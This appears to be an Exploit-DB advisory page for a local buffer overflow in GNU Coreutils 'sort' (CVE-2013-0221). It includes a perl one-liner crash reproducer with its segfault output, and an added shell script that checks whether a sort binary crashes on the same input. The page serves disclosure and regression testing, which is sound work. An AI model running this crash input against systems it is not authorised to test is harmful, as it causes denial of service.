- 18 Dec 2022
- EDB-ID: 38232
- EDB verification: Passed
- Author: ANONYMOUS
- Vulnerability type: LOCAL
- Platform: LINUX
- CVE: CVE-2013-0221
- Publication date: 2013-01-21
GNU Coreutils 'sort' Text Utility - Local Buffer Overflow
Code:
source: https://www.securityfocus.com/bid/57492/info
GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.
A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed.
% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13432 segmentation fault sort -d
% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13434 segmentation fault sort -M
- Source: www.exploit-db.com
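A regression check built around the reproducer above, as an added example that is not part of the original advisory: it feeds the same input to a given `sort` binary in both option modes shown (`-d` and `-M`) and reports whether the process died on a signal. The function names and the `LINE_LEN` variable are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the advisory. LINE_LEN defaults to the
# 50000000 'A' characters used in the reproducer on the page.
LINE_LEN=${LINE_LEN:-50000000}

# Emit the page's input: "1", LINE_LEN times 'A', then "\r\n\r\n".
long_line() {
    printf '1'
    head -c "$LINE_LEN" /dev/zero | tr '\0' 'A'
    printf '\r\n\r\n'
}

# Run "$@" on that input and print "ok", "signal N" or "error N".
# An exit status above 128 is read as death by signal N = status - 128,
# which is how the shell reports a killed child.
probe() {
    rc=0
    (
        ulimit -c 0 2>/dev/null      # no core file if the binary crashes
        long_line | "$@" >/dev/null
    ) 2>/dev/null || rc=$?
    if [ "$rc" -eq 0 ]; then
        echo "ok"
    elif [ "$rc" -gt 128 ]; then
        echo "signal $((rc - 128))"
    else
        echo "error $rc"
    fi
}

# Probe both modes from the page; return 1 if either run died on a signal.
check_modes() {
    bad=0
    for opt in -d -M; do
        res=$(probe "$@" "$opt")
        echo "$* $opt: $res"
        case $res in signal*) bad=1 ;; esac
    done
    return "$bad"
}

# Stand-alone use: sh check.sh /path/to/sort
if [ "$#" -gt 0 ]; then
    check_modes "$@"
fi
```

A result of `signal 11` corresponds to the segmentation fault shown in the advisory output; exit status 1 from the script means at least one mode was killed by a signal.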